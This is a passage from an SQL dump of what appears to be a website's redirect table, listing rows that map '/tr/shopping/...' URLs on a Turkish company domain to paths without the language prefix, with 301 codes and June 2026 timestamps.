05:21:58','0000-00-00 00:00:00',301),(73146,'https://3s-technologies.com.tr/tr/shopping/photic/2708655030.html',NULL,'https://3s-technologies.com.tr/shopping/photic/2708655030.html','',1,0,'2026-06-11 05:22:06','0000-00-00 00:00:00',301),(73147,'https://3s-technologies.com.tr/tr/shopping/millers/3491275128.html',NULL,'https://3s-technologies.com.tr/shopping/millers/3491275128.html','',1,0,'2026-06-11 05:22:08','0000-00-00 00:00:00',301),(73148,'https://3s-technologies.com.tr/tr/shopping/spiry/2438730329.html',NULL,'https://3s-technologies.com.tr/shopping/spiry/2438730329.html','',1,0,'2026-06-11 05:22:30','0000-00-00 00:00:00',301),(73149,'https://3s-technologies.com.tr/tr/shopping/meech/3005079961.html',NULL,'https://3s-technologies.com.tr/shopping/meech/3005079961.html','',1,0,'2026-06-11 05:22:35','0000-00-00 00:00:00',301),(73150,'https://3s-technologies.com.tr/tr/shopping/shelling/3976813236.html',NULL,'https://3s-technologies.com.tr/shopping/shelling/3976813236.html','',1,0,'2026-06-11 05:22:38','0000-00-00 00:00:00',301),(73151,'https://3s-technologies.com.tr/tr/shopping/enjoying/3128995599.html',NULL,'https://3s-technologies.com.tr/shopping/enjoying/3128995599.html','',1,0,'2026-06-11 05:22:41','0000-00-00 00:00:00',301),(73152,'https://3s-technologies.com.tr/tr/shopping/achene/1498020205.html',NULL,'https://3s-technologies.com.tr/shopping/achene/1498020205.html','',1,0,'2026-06-11 05:22:44','0000-00-00 00:00:00',301),(73153,'https://3s-technologies.com.tr/tr/shopping/unspin/1625510609.html',NULL,'https://3s-technologies.com.tr/shopping/unspin/1625510609.html','',1,0,'2026-06-11 05:22:47','0000-00-00 00:00:00',301),(73154,'https://3s-technologies.com.tr/tr/shopping/option/1273419541.html',NULL,'https://3s-technologies.com.tr/shopping/option/1273419541.html','',1,0,'2026-06-11 05:22:50','0000-00-00 00:00:00',301),(73155,'https://3s-technologies.com.tr/tr/shopping/entitling/3243355016.html',NULL,'https://3s-technologies.com.tr/shopping/entitling/3243355016.html','',1,0,'2026-06-11 05:22:53','0000-00-00 00:00:00',301),(73156,'https://3s-technologies.com.tr/tr/shopping/anthea/3654565616.html',NULL,'https://3s-technologies.com.tr/shopping/anthea/3654565616.html','',1,0,'2026-06-11 05:22:56','0000-00-00 00:00:00',301),(73157,'https://3s-technologies.com.tr/tr/shopping/xiphius/819673823.html',NULL,'https://3s-technologies.com.tr/shopping/xiphius/819673823.html','',1,0,'2026-06-11 05:22:59','0000-00-00 00:00:00',301),(73158,'https://3s-technologies.com.tr/tr/shopping/pacifiable/2933168125.html',NULL,'https://3s-technologies.com.tr/shopping/pacifiable/2933168125.html','',1,0,'2026-06-11 05:23:02','0000-00-00 00:00:00',301),(73159,'https://3s-technologies.com.tr/tr/shopping/catlin/3981565563.html',NULL,'https://3s-technologies.com.tr/shopping/catlin/3981565563.html','',1,0,'2026-06-11 05:23:05','0000-00-00 00:00:00',301),(73160,'https://3s-technologies.com.tr/tr/shopping/scullery/2290975679.html',NULL,'https://3s-technologies.com.tr/shopping/scullery/2290975679.html','',1,0,'2026-06-11 05:23:08','0000-00-00 00:00:00',301),(73161,'https://3s-technologies.com.tr/tr/shopping/undight/132051462.html',NULL,'https://3s-technologies.com.tr/shopping/undight/132051462.html','',1,0,'2026-06-11 05:23:11','0000-00-00 00:00:00',301),(73162,'https://3s-technologies.com.tr/tr/shopping/overmore/2034296979.html',NULL,'https://3s-technologies.com.tr/shopping/overmore/2034296979.html','',1,0,'2026-06-11 05:23:14','0000-00-00 00:00:00',301),(73163,'https://3s-technologies.com.tr/tr/shopping/cytogenic/319828089.html',NULL,'https://3s-technologies.com.tr/shopping/cytogenic/319828089.html','',1,0,'2026-06-11 05:23:17','0000-00-00 00:00:00',301),(73164,'https://3s-technologies.com.tr/tr/shopping/colonizer/2536516985.html',NULL,'https://3s-technologies.com.tr/shopping/colonizer/2536516985.html','',1,0,'2026-06-11 05:23:20','0000-00-00 00:00:00',301),(73165,'https://3s-technologies.com.tr/tr/shopping/unwray/1986753183.html',NULL,'https://3s-technologies.com.tr/shopping/unwray/1986753183.html','',1,0,'2026-06-11 05:23:23','0000-00-00 00:00:00',301),(73166,'https://3s-technologies.com.tr/tr/shopping/expertness/312343130.html',NULL,'https://3s-technologies.com.tr/shopping/expertness/312343130.html','',1,0,'2026-06-11 05:23:26','0000-00-00 00:00:00',301),(73167,'https://3s-technologies.com.tr/tr/shopping/suctorious/2076528938.html',NULL,'https://3s-technologies.com.tr/shopping/suctorious/2076528938.html','',1,0,'2026-06-11 05:23:29','0000-00-00 00:00:00',301),(73168,'https://3s-technologies.com.tr/tr/shopping/accipitral/1320845238.html',NULL,'https://3s-technologies.com.tr/shopping/accipitral/1320845238.html','',1,0,'2026-06-11 05:23:32','0000-00-00 00:00:00',301),(73169,'https://3s-technologies.com.tr/tr/shopping/aegilops/339115237.html',NULL,'https://3s-technologies.com.tr/shopping/aegilops/339115237.html','',1,0,'2026-06-11 05:23:39','0000-00-00 00:00:00',301),(73170,'https://3s-technologies.com.tr/tr/shopping/misadventurous/1950243942.html',NULL,'https://3s-technologies.com.tr/shopping/misadventurous/1950243942.html','',1,0,'2026-06-11 05:23:46','0000-00-00 00:00:00',301),(73171,'https://3s-technologies.com.tr/tr/shopping/styan/4178441613.html',NULL,'https://3s-technologies.com.tr/shopping/styan/4178441613.html','',1,0,'2026-06-11 05:23:48','0000-00-00 00:00:00',301),(73172,'https://3s-technologies.com.tr/tr/shopping/capitellata/2279899815.html',NULL,'https://3s-technologies.com.tr/shopping/capitellata/2279899815.html','',1,0,'2026-06-11 05:23:51','0000-00-00 00:00:00',301),(73173,'https://3s-technologies.com.tr/tr/shopping/douceur/1082220833.html',NULL,'https://3s-technologies.com.tr/shopping/douceur/1082220833.html','',1,0,'2026-06-11 05:23:54','0000-00-00 00:00:00',301),(73174,'https://3s-technologies.com.tr/tr/shopping/persicot/376758408.html',NULL,'https://3s-technologies.com.tr/shopping/persicot/376758408.html','',1,0,'2026-06-11 05:23:57','0000-00-00 00:00:00',301),(73175,'https://3s-technologies.com.tr/tr/shopping/uratic/3253666538.html',NULL,'https://3s-technologies.com.tr/shopping/uratic/3253666538.html','',1,0,'2026-06-11 05:24:00','0000-00-00 00:00:00',301),(73176,'https://3s-technologies.com.tr/tr/shopping/relishable/1990293379.html',NULL,'https://3s-technologies.com.tr/shopping/relishable/1990293379.html','',1,0,'2026-06-11 05:24:03','0000-00-00 00:00:00',301),(73177,'https://3s-technologies.com.tr/tr/shopping/pentamerous/1358654131.html',NULL,'https://3s-technologies.com.tr/shopping/pentamerous/1358654131.html','',1,0,'2026-06-11 05:24:06','0000-00-00 00:00:00',301),(73178,'https://3s-technologies.com.tr/tr/shopping/fumid/66925369.html',NULL,'https://3s-technologies.com.tr/shopping/fumid/66925369.html','',1,0,'2026-06-11 05:24:09','0000-00-00 00:00:00',301),(73179,'https://3s-technologies.com.tr/tr/shopping/skirted/435903994.html',NULL,'https://3s-technologies.com.tr/shopping/skirted/435903994.html','',1,0,'2026-06-11 05:24:12','0000-00-00 00:00:00',301),(73180,'https://3s-technologies.com.tr/tr/shopping/attal/2849233187.html',NULL,'https://3s-technologies.com.tr/shopping/attal/2849233187.html','',1,0,'2026-06-11 05:24:15','0000-00-00 00:00:00',301),(73181,'https://3s-technologies.com.tr/tr/shopping/sylviculture/4269553028.html',NULL,'https://3s-technologies.com.tr/shopping/sylviculture/4269553028.html','',1,0,'2026-06-11 05:24:18','0000-00-00 00:00:00',301),(73182,'https://3s-technologies.com.tr/tr/shopping/errantia/1853013774.html',NULL,'https://3s-technologies.com.tr/shopping/errantia/1853013774.html','',1,0,'2026-06-11 05:24:21','0000-00-00 00:00:00',301),(73183,'https://3s-technologies.com.tr/tr/shopping/potatory/1444675506.html',NULL,'https://3s-technologies.com.tr/shopping/potatory/1444675506.html','',1,0,'2026-06-11 05:24:24','0000-00-00 00:00:00',301),(73184,'https://3s-technologies.com.tr/tr/shopping/surrogation/2065503767.html',NULL,'https://3s-technologies.com.tr/shopping/surrogation/2065503767.html','',1,0,'2026-06-11 05:24:27','0000-00-00 00:00:00',301),(73185,'https://3s-technologies.com.tr/tr/shopping/graucalus/2319921792.html',NULL,'https://3s-technologies.com.tr/shopping/graucalus/2319921792.html','',1,0,'2026-06-11 05:24:35','0000-00-00 00:00:00',301),(73186,'https://3s-technologies.com.tr/tr/shopping/dunne/2871340552.html',NULL,'https://3s-technologies.com.tr/shopping/dunne/2871340552.html','',1,0,'2026-06-11 05:24:37','0000-00-00 00:00:00',301),(73187,'https://3s-technologies.com.tr/tr/shopping/serena/3695458845.html',NULL,'https://3s-technologies.com.tr/shopping/serena/3695458845.html','',1,0,'2026-06-11 05:24:40','0000-00-00 00:00:00',301),(73188,'https://3s-technologies.com.tr/tr/shopping/emptying/1160873968.html',NULL,'https://3s-technologies.com.tr/shopping/emptying/1160873968.html','',1,0,'2026-06-11 05:24:43','0000-00-00 00:00:00',301),(73189,'https://3s-technologies.com.tr/tr/shopping/crisp/1687269384.html',NULL,'https://3s-technologies.com.tr/shopping/crisp/1687269384.html','',1,0,'2026-06-11 05:24:46','0000-00-00 00:00:00',301),(73190,'https://3s-technologies.com.tr/tr/shopping/sawwort/375382802.html',NULL,'https://3s-technologies.com.tr/shopping/sawwort/375382802.html','',1,0,'2026-06-11 05:24:49','0000-00-00 00:00:00',301),(73191,'https://3s-technologies.com.tr/tr/shopping/unsubstantial/703146579.html',NULL,'https://3s-technologies.com.tr/shopping/unsubstantial/703146579.html','',1,0,'2026-06-11 05:24:52','0000-00-00 00:00:00',301),(73192,'https://3s-technologies.com.tr/tr/shopping/colline/2928415798.html',NULL,'https://3s-technologies.com.tr/shopping/colline/2928415798.html','',1,0,'2026-06-11 05:24:55','0000-00-00 00:00:00',301),(73193,'https://3s-technologies.com.tr/tr/shopping/graille/882067252.html',NULL,'https://3s-technologies.com.tr/shopping/graille/882067252.html','',1,0,'2026-06-11 05:24:58','0000-00-00 00:00:00',301),(73194,'https://3s-technologies.com.tr/tr/shopping/perseid/2103445492.html',NULL,'https://3s-technologies.com.tr/shopping/perseid/2103445492.html','',1,0,'2026-06-11 05:25:01','0000-00-00 00:00:00',301),(73195,'https://3s-technologies.com.tr/tr/shopping/wringer/1493817524.html',NULL,'https://3s-technologies.com.tr/shopping/wringer/1493817524.html','',1,0,'2026-06-11 05:25:04','0000-00-00 00:00:00',301),(73196,'https://3s-technologies.com.tr/tr/shopping/phonograph/1448137565.html',NULL,'https://3s-technologies.com.tr/shopping/phonograph/1448137565.html','',1,0,'2026-06-11 05:25:07','0000-00-00 00:00:00',301),(73197,'https://3s-technologies.com.tr/tr/shopping/hithe/3746387846.html',NULL,'https://3s-technologies.com.tr/shopping/hithe/3746387846.html','',1,0,'2026-06-11 05:25:10','0000-00-00 00:00:00',301),(73198,'https://3s-technologies.com.tr/tr/shopping/sideroxylon/4252197974.html',NULL,'https://3s-technologies.com.tr/shopping/sideroxylon/4252197974.html','',1,0,'2026-06-11 05:25:13','0000-00-00 00:00:00',301),(73199,'https://3s-technologies.com.tr/tr/shopping/submissively/3439873993.html',NULL,'https://3s-technologies.com.tr/shopping/submissively/3439873993.html','',1,0,'2026-06-11 05:25:16','0000-00-00 00:00:00',301),(73200,'https://3s-technologies.com.tr/tr/shopping/irascibility/2964609747.html',NULL,'https://3s-technologies.com.tr/shopping/irascibility/2964609747.html','',1,0,'2026-06-11 05:25:19','0000-00-00 00:00:00',301),(73201,'https://3s-technologies.com.tr/tr/shopping/cocoonery/983734951.html',NULL,'https://3s-technologies.com.tr/shopping/cocoonery/983734951.html','',1,0,'2026-06-11 05:25:22','0000-00-00 00:00:00',301),(73202,'https://3s-technologies.com.tr/tr/shopping/biland/613224385.html',NULL,'https://3s-technologies.com.tr/shopping/biland/613224385.html','',1,0,'2026-06-11 05:25:25','0000-00-00 00:00:00',301),(73203,'https://3s-technologies.com.tr/tr/shopping/cupric/3375332200.html',NULL,'https://3s-technologies.com.tr/shopping/cupric/3375332200.html','',1,0,'2026-06-11 05:25:28','0000-00-00 00:00:00',301),(73204,'https://3s-technologies.com.tr/tr/shopping/oppress/2398025281.html',NULL,'https://3s-technologies.com.tr/shopping/oppress/2398025281.html','',1,0,'2026-06-11 05:25:31','0000-00-00 00:00:00',301),(73205,'https://3s-technologies.com.tr/tr/shopping/collyria/416019100.html',NULL,'https://3s-technologies.com.tr/shopping/collyria/416019100.html','',1,0,'2026-06-11 05:25:34','0000-00-00 00:00:00',301),(73206,'https://3s-technologies.com.tr/tr/shopping/acquisitive/1030399363.html',NULL,'https://3s-technologies.com.tr/shopping/acquisitive/1030399363.html','',1,0,'2026-06-11 05:25:37','0000-00-00 00:00:00',301),(73207,'https://3s-technologies.com.tr/tr/shopping/poles/720665156.html',NULL,'https://3s-technologies.com.tr/shopping/poles/720665156.html','',1,0,'2026-06-11 05:25:40','0000-00-00 00:00:00',301),(73208,'https://3s-technologies.com.tr/tr/shopping/manoeuvred/74205544.html',NULL,'https://3s-technologies.com.tr/shopping/manoeuvred/74205544.html','',1,0,'2026-06-11 05:25:43','0000-00-00 00:00:00',301),(73209,'https://3s-technologies.com.tr/tr/shopping/virginity/527889763.html',NULL,'https://3s-technologies.com.tr/shopping/virginity/527889763.html','',1,0,'2026-06-11 05:25:46','0000-00-00 00:00:00',301),(73210,'https://3s-technologies.com.tr/tr/shopping/distributary/897681227.html',NULL,'https://3s-technologies.com.tr/shopping/distributary/897681227.html','',1,0,'2026-06-11 05:25:49','0000-00-00 00:00:00',301),(73211,'https://3s-technologies.com.tr/tr/shopping/gerrymandered/553793707.html',NULL,'https://3s-technologies.com.tr/shopping/gerrymandered/553793707.html','',1,0,'2026-06-11 05:25:52','0000-00-00 00:00:00',301),(73212,'https://3s-technologies.com.tr/tr/shopping/pilfer/2329262891.html',NULL,'https://3s-technologies.com.tr/shopping/pilfer/2329262891.html','',1,0,'2026-06-11 05:25:55','0000-00-00 00:00:00',301),(73213,'https://3s-technologies.com.tr/tr/shopping/factitious/4054689498.html',NULL,'https://3s-technologies.com.tr/shopping/factitious/4054689498.html','',1,0,'2026-06-11 05:25:58','0000-00-00 00:00:00',301),(73214,'https://3s-technologies.com.tr/tr/shopping/equidifferent/1114639704.html',NULL,'https://3s-technologies.com.tr/shopping/equidifferent/1114639704.html','',1,0,'2026-06-11 05:26:01','0000-00-00 00:00:00',301),(73215,'https://3s-technologies.com.tr/tr/shopping/milice/267732397.html',NULL,'https://3s-technologies.com.tr/shopping/milice/267732397.html','',1,0,'2026-06-11 05:26:07','0000-00-00 00:00:00',301),(73216,'https://3s-technologies.com.tr/tr/shopping/fagot/2172378256.html',NULL,'https://3s-technologies.com.tr/shopping/fagot/2172378256.html','',1,0,'2026-06-11 05:26:09','0000-00-00 00:00:00',301),(73217,'https://3s-technologies.com.tr/tr/shopping/defoul/1982164395.html',NULL,'https://3s-technologies.com.tr/shopping/defoul/1982164395.html','',1,0,'2026-06-11 05:26:12','0000-00-00 00:00:00',301),(73218,'https://3s-technologies.com.tr/tr/shopping/purrock/3633065384.html',NULL,'https://3s-technologies.com.tr/shopping/purrock/3633065384.html','',1,0,'2026-06-11 05:26:15','0000-00-00 00:00:00',301),(73219,'https://3s-technologies.com.tr/tr/shopping/extreat/573572959.html',NULL,'https://3s-technologies.com.tr/shopping/extreat/573572959.html','',1,0,'2026-06-11 05:26:18','0000-00-00 00:00:00',301),(73220,'https://3s-technologies.com.tr/tr/shopping/unbeguiling/1374189953.html',NULL,'https://3s-technologies.com.tr/shopping/unbeguiling/1374189953.html','',1,0,'2026-06-11 05:26:21','0000-00-00 00:00:00',301),(73221,'https://3s-technologies.com.tr/tr/shopping/maternal/1480319809.html',NULL,'https://3s-technologies.com.tr/shopping/maternal/1480319809.html','',1,0,'2026-06-11 05:26:24','0000-00-00 00:00:00',301),(73222,'https://3s-technologies.com.tr/tr/shopping/flounder/2387550236.html',NULL,'https://3s-technologies.com.tr/shopping/flounder/2387550236.html','',1,0,'2026-06-11 05:26:27','0000-00-00 00:00:00',301),(73223,'https://3s-technologies.com.tr/tr/shopping/cooperate/4223339430.html',NULL,'https://3s-technologies.com.tr/shopping/cooperate/4223339430.html','',1,0,'2026-06-11 05:26:30','0000-00-00 00:00:00',301),(73224,'https://3s-technologies.com.tr/tr/shopping/grassgreen/163106993.html',NULL,'https://3s-technologies.com.tr/shopping/grassgreen/163106993.html','',1,0,'2026-06-11 05:26:33','0000-00-00 00:00:00',301),(73225,'https://3s-technologies.com.tr/tr/shopping/peptics/3840987406.html',NULL,'https://3s-technologies.com.tr/shopping/peptics/3840987406.html','',1,0,'2026-06-11 05:26:36','0000-00-00 00:00:00',301),(73226,'https://3s-technologies.com.tr/tr/shopping/graham/2657134071.html',NULL,'https://3s-technologies.com.tr/shopping/graham/2657134071.html','',1,0,'2026-06-11 05:26:39','0000-00-00 00:00:00',301),(73227,'https://3s-technologies.com.tr/tr/shopping/corydalus/2601579390.html',NULL,'https://3s-technologies.com.tr/shopping/corydalus/2601579390.html','',1,0,'2026-06-11 05:26:42','0000-00-00 00:00:00',301),(73228,'https://3s-technologies.com.tr/tr/shopping/fomentation/1061964971.html',NULL,'https://3s-technologies.com.tr/shopping/fomentation/1061964971.html','',1,0,'2026-06-11 05:26:45','0000-00-00 00:00:00',301),(73229,'https://3s-technologies.com.tr/tr/shopping/verbalism/691264154.html',NULL,'https://3s-technologies.com.tr/shopping/verbalism/691264154.html','',1,0,'2026-06-11 05:26:48','0000-00-00 00:00:00',301),(73230,'https://3s-technologies.com.tr/tr/shopping/envies/2689225025.html',NULL,'https://3s-technologies.com.tr/shopping/envies/2689225025.html','',1,0,'2026-06-11 05:26:51','0000-00-00 00:00:00',301),(73231,'https://3s-technologies.com.tr/tr/shopping/aduncous/3086645509.html',NULL,'https://3s-technologies.com.tr/shopping/aduncous/3086645509.html','',1,0,'2026-06-11 05:26:54','0000-00-00 00:00:00',301),(73232,'https://3s-technologies.com.tr/tr/shopping/adullam/2984348218.html',NULL,'https://3s-technologies.com.tr/shopping/adullam/2984348218.html','',1,0,'2026-06-11 05:26:57','0000-00-00 00:00:00',301),(73233,'https://3s-technologies.com.tr/tr/shopping/polished/3593735942.html',NULL,'https://3s-technologies.com.tr/shopping/polished/3593735942.html','',1,0,'2026-06-11 05:27:00','0000-00-00 00:00:00',301),(73234,'https://3s-technologies.com.tr/tr/shopping/horsehide/950680568.html',NULL,'https://3s-technologies.com.tr/shopping/horsehide/950680568.html','',1,0,'2026-06-11 05:27:03','0000-00-00 00:00:00',301),(73235,'https://3s-technologies.com.tr/tr/shopping/venerous/3516152049.html',NULL,'https://3s-technologies.com.tr/shopping/venerous/3516152049.html','',1,0,'2026-06-11 05:27:06','0000-00-00 00:00:00',301),(73236,'https://3s-technologies.com.tr/tr/shopping/enpatron/3555007303.html',NULL,'https://3s-technologies.com.tr/shopping/enpatron/3555007303.html','',1,0,'2026-06-11 05:27:09','0000-00-00 00:00:00',301),(73237,'https://3s-technologies.com.tr/tr/shopping/starfinch/2867800340.html',NULL,'https://3s-technologies.com.tr/shopping/starfinch/2867800340.html','',1,0,'2026-06-11 05:27:12','0000-00-00 00:00:00',301),(73238,'https://3s-technologies.com.tr/tr/shopping/semiopaque/38334030.html',NULL,'https://3s-technologies.com.tr/shopping/semiopaque/38334030.html','',1,0,'2026-06-11 05:27:16','0000-00-00 00:00:00',301),(73239,'https://3s-technologies.com.tr/tr/shopping/lophobranchii/2317835355.html',NULL,'https://3s-technologies.com.tr/shopping/lophobranchii/2317835355.html','',1,0,'2026-06-11 05:27:18','0000-00-00 00:00:00',301),(73240,'https://3s-technologies.com.tr/tr/shopping/historical/2273061083.html',NULL,'https://3s-technologies.com.tr/shopping/historical/2273061083.html','',1,0,'2026-06-11 05:27:27','0000-00-00 00:00:00',301),(73241,'https://3s-technologies.com.tr/tr/shopping/platel/1290040831.html',NULL,'https://3s-technologies.com.tr/shopping/platel/1290040831.html','',1,0,'2026-06-11 05:27:29','0000-00-00 00:00:00',301),(73242,'https://3s-technologies.com.tr/tr/shopping/citrine/291611403.html',NULL,'https://3s-technologies.com.tr/shopping/citrine/291611403.html','',1,0,'2026-06-11 05:27:32','0000-00-00 00:00:00',301),(73243,'https://3s-technologies.com.tr/tr/shopping/bearsfoot/1103085553.html',NULL,'https://3s-technologies.com.tr/shopping/bearsfoot/1103085553.html','',1,0,'2026-06-11 05:27:35','0000-00-00 00:00:00',301),(73244,'https://3s-technologies.com.tr/tr/shopping/distention/1389120793.html',NULL,'https://3s-technologies.com.tr/shopping/distention/1389120793.html','',1,0,'2026-06-11 05:27:38','0000-00-00 00:00:00',301),(73245,'https://3s-technologies.com.tr/tr/shopping/curtana/432767005.html',NULL,'https://3s-technologies.com.tr/shopping/curtana/432767005.html','',1,0,'2026-06-11 05:27:41','0000-00-00 00:00:00',301),(73246,'https://3s-technologies.com.tr/tr/shopping/cohabiting/336527532.html',NULL,'https://3s-technologies.com.tr/shopping/cohabiting/336527532.html','',1,0,'2026-06-11 05:27:44','0000-00-00 00:00:00',301),(73247,'https://3s-technologies.com.tr/tr/shopping/headpin/3459267138.html',NULL,'https://3s-technologies.com.tr/shopping/headpin/3459267138.html','',1,0,'2026-06-11 05:27:47','0000-00-00 00:00:00',301),(73248,'https://3s-technologies.com.tr/tr/shopping/lamprey/3294157402.html',NULL,'https://3s-technologies.com.tr/shopping/lamprey/3294157402.html','',1,0,'2026-06-11 05:27:50','0000-00-00 00:00:00',301),(73249,'https://3s-technologies.com.tr/tr/shopping/ramagious/2559183892.html',NULL,'https://3s-technologies.com.tr/shopping/ramagious/2559183892.html','',1,0,'2026-06-11 05:27:53','0000-00-00 00:00:00',301),(73250,'https://3s-technologies.com.tr/tr/shopping/assiduously/2024483907.html',NULL,'https://3s-technologies.com.tr/shopping/assiduously/2024483907.html','',1,0,'2026-06-11 05:27:56','0000-00-00 00:00:00',301),(73251,'https://3s-technologies.com.tr/tr/shopping/holour/2685298690.html',NULL,'https://3s-technologies.com.tr/shopping/holour/2685298690.html','',1,0,'2026-06-11 05:27:59','0000-00-00 00:00:00',301),(73252,'https://3s-technologies.com.tr/tr/shopping/monochronic/1811294553.html',NULL,'https://3s-technologies.com.tr/shopping/monochronic/1811294553.html','',1,0,'2026-06-11 05:28:02','0000-00-00 00:00:00',301),(73253,'https://3s-technologies.com.tr/tr/shopping/cnidae/488321686.html',NULL,'https://3s-technologies.com.tr/shopping/cnidae/488321686.html','',1,0,'2026-06-11 05:28:05','0000-00-00 00:00:00',301),(73254,'https://3s-technologies.com.tr/tr/shopping/orval/3251983324.html',NULL,'https://3s-technologies.com.tr/shopping/orval/3251983324.html','',1,0,'2026-06-11 05:28:08','0000-00-00 00:00:00',301),(73255,'https://3s-technologies.com.tr/tr/shopping/pauper/1190482518.html',NULL,'https://3s-technologies.com.tr/shopping/pauper/1190482518.html','',1,0,'2026-06-11 05:28:11','0000-00-00 00:00:00',301),(73256,'https://3s-technologies.com.tr/tr/shopping/surcease/2026648513.html',NULL,'https://3s-technologies.com.tr/shopping/surcease/2026648513.html','',1,0,'2026-06-11 05:28:14','0000-00-00 00:00:00',301),(73257,'https://3s-technologies.com.tr/tr/shopping/backdoor/1518837302.html',NULL,'https://3s-technologies.com.tr/shopping/backdoor/1518837302.html','',1,0,'2026-06-11 05:28:17','0000-00-00 00:00:00',301),(73258,'https://3s-technologies.com.tr/tr/shopping/armadillos/227665012.html',NULL,'https://3s-technologies.com.tr/shopping/armadillos/227665012.html','',1,0,'2026-06-11 05:28:22','0000-00-00 00:00:00',301),(73259,'https://3s-technologies.com.tr/tr/shopping/terrenity/3193247338.html',NULL,'https://3s-technologies.com.tr/shopping/terrenity/3193247338.html','',1,0,'2026-06-11 05:28:24','0000-00-00 00:00:00',301),(73260,'https://3s-technologies.com.tr/tr/shopping/bushboy/3033938505.html',NULL,'https://3s-technologies.com.tr/shopping/bushboy/3033938505.html','',1,0,'2026-06-11 05:28:27','0000-00-00 00:00:00',301),(73261,'https://3s-technologies.com.tr/tr/shopping/spermato/1540415671.html',NULL,'https://3s-technologies.com.tr/shopping/spermato/1540415671.html','',1,0,'2026-06-11 05:28:30','0000-00-00 00:00:00',301),(73262,'https://3s-technologies.com.tr/tr/shopping/dedalous/960520975.html',NULL,'https://3s-technologies.com.tr/shopping/dedalous/960520975.html','',1,0,'2026-06-11 05:28:33','0000-00-00 00:00:00',301),(73263,'https://3s-technologies.com.tr/tr/shopping/coalite/3661636451.html',NULL,'https://3s-technologies.com.tr/shopping/coalite/3661636451.html','',1,0,'2026-06-11 05:28:36','0000-00-00 00:00:00',301),(73264,'https://3s-technologies.com.tr/tr/shopping/ichnolite/3391004024.html',NULL,'https://3s-technologies.com.tr/shopping/ichnolite/3391004024.html','',1,0,'2026-06-11 05:28:39','0000-00-00 00:00:00',301),(73265,'https://3s-technologies.com.tr/tr/shopping/potentiometer/913421321.html',NULL,'https://3s-technologies.com.tr/shopping/potentiometer/913421321.html','',1,0,'2026-06-11 05:28:42','0000-00-00 00:00:00',301),(73266,'https://3s-technologies.com.tr/tr/shopping/bathorse/4252584113.html',NULL,'https://3s-technologies.com.tr/shopping/bathorse/4252584113.html','',1,0,'2026-06-11 05:28:45','0000-00-00 00:00:00',301),(73267,'https://3s-technologies.com.tr/tr/shopping/uptie/1862096955.html',NULL,'https://3s-technologies.com.tr/shopping/uptie/1862096955.html','',1,0,'2026-06-11 05:28:48','0000-00-00 00:00:00',301),(73268,'https://3s-technologies.com.tr/tr/shopping/plurisy/3601607040.html',NULL,'https://3s-technologies.com.tr/shopping/plurisy/3601607040.html','',1,0,'2026-06-11 05:28:51','0000-00-00 00:00:00',301),(73269,'https://3s-technologies.com.tr/tr/shopping/palingenetically/217835714.html',NULL,'https://3s-technologies.com.tr/shopping/palingenetically/217835714.html','',1,0,'2026-06-11 05:28:54','0000-00-00 00:00:00',301),(73270,'https://3s-technologies.com.tr/tr/shopping/calligrapher/1467773928.html',NULL,'https://3s-technologies.com.tr/shopping/calligrapher/1467773928.html','',1,0,'2026-06-11 05:28:57','0000-00-00 00:00:00',301),(73271,'https://3s-technologies.com.tr/tr/shopping/freeliving/2853122630.html',NULL,'https://3s-technologies.com.tr/shopping/freeliving/2853122630.html','',1,0,'2026-06-11 05:29:00','0000-00-00 00:00:00',301),(73272,'https://3s-technologies.com.tr/tr/shopping/marrott/3503820384.html',NULL,'https://3s-technologies.com.tr/shopping/marrott/3503820384.html','',1,0,'2026-06-11 05:29:03','0000-00-00 00:00:00',301),(73273,'https://3s-technologies.com.tr/tr/shopping/leven/2729292378.html',NULL,'https://3s-technologies.com.tr/shopping/leven/2729292378.html','',1,0,'2026-06-11 05:29:06','0000-00-00 00:00:00',301),(73274,'https://3s-technologies.com.tr/tr/shopping/outring/2435363027.html',NULL,'https://3s-technologies.com.tr/shopping/outring/2435363027.html','',1,0,'2026-06-11 05:29:09','0000-00-00 00:00:00',301),(73275,'https://3s-technologies.com.tr/tr/shopping/watercourse/2839403889.html',NULL,'https://3s-technologies.com.tr/shopping/watercourse/2839403889.html','',1,0,'2026-06-11 05:29:12','0000-00-00 00:00:00',301),(73276,'https://3s-technologies.com.tr/tr/shopping/shakeress/4009877022.html',NULL,'https://3s-technologies.com.tr/shopping/shakeress/4009877022.html','',1,0,'2026-06-11 05:29:15','0000-00-00 00:00:00',301),(73277,'https://3s-technologies.com.tr/tr/shopping/molybdenous/4142472602.html',NULL,'https://3s-technologies.com.tr/shopping/molybdenous/4142472602.html','',1,0,'2026-06-11 05:29:18','0000-00-00 00:00:00',301),(73278,'https://3s-technologies.com.tr/tr/shopping/weighage/2641213716.html',NULL,'https://3s-technologies.com.tr/shopping/weighage/2641213716.html','',1,0,'2026-06-11 05:29:21','0000-00-00 00:00:00',301),(73279,'https://3s-technologies.com.tr/tr/shopping/vesicula/3736103659.html',NULL,'https://3s-technologies.com.tr/shopping/vesicula/3736103659.html','',1,0,'2026-06-11 05:29:24','0000-00-00 00:00:00',301),(73280,'https://3s-technologies.com.tr/tr/shopping/spheroidally/3687465847.html',NULL,'https://3s-technologies.com.tr/shopping/spheroidally/3687465847.html','',1,0,'2026-06-11 05:29:27','0000-00-00 00:00:00',301),(73281,'https://3s-technologies.com.tr/tr/shopping/kiteflying/1976814322.html',NULL,'https://3s-technologies.com.tr/shopping/kiteflying/1976814322.html','',1,0,'2026-06-11 05:29:30','0000-00-00 00:00:00',301),(73282,'https://3s-technologies.com.tr/tr/shopping/heulandite/2201308127.html',NULL,'https://3s-technologies.com.tr/shopping/heulandite/2201308127.html','',1,0,'2026-06-11 05:29:33','0000-00-00 00:00:00',301),(73283,'https://3s-technologies.com.tr/tr/shopping/discoast/2371956927.html',NULL,'https://3s-technologies.com.tr/shopping/discoast/2371956927.html','',1,0,'2026-06-11 05:29:36','0000-00-00 00:00:00',301),(73284,'https://3s-technologies.com.tr/tr/shopping/turbination/1056046956.html',NULL,'https://3s-technologies.com.tr/shopping/turbination/1056046956.html','',1,0,'2026-06-11 05:29:39','0000-00-00 00:00:00',301),(73285,'https://3s-technologies.com.tr/tr/shopping/claudent/3227106403.html',NULL,'https://3s-technologies.com.tr/shopping/claudent/3227106403.html','',1,0,'2026-06-11 05:29:42','0000-00-00 00:00:00',301),(73286,'https://3s-technologies.com.tr/tr/shopping/nematodes/3781066505.html',NULL,'https://3s-technologies.com.tr/shopping/nematodes/3781066505.html','',1,0,'2026-06-11 05:29:45','0000-00-00 00:00:00',301),(73287,'https://3s-technologies.com.tr/tr/shopping/tetaug/1877256009.html',NULL,'https://3s-technologies.com.tr/shopping/tetaug/1877256009.html','',1,0,'2026-06-11 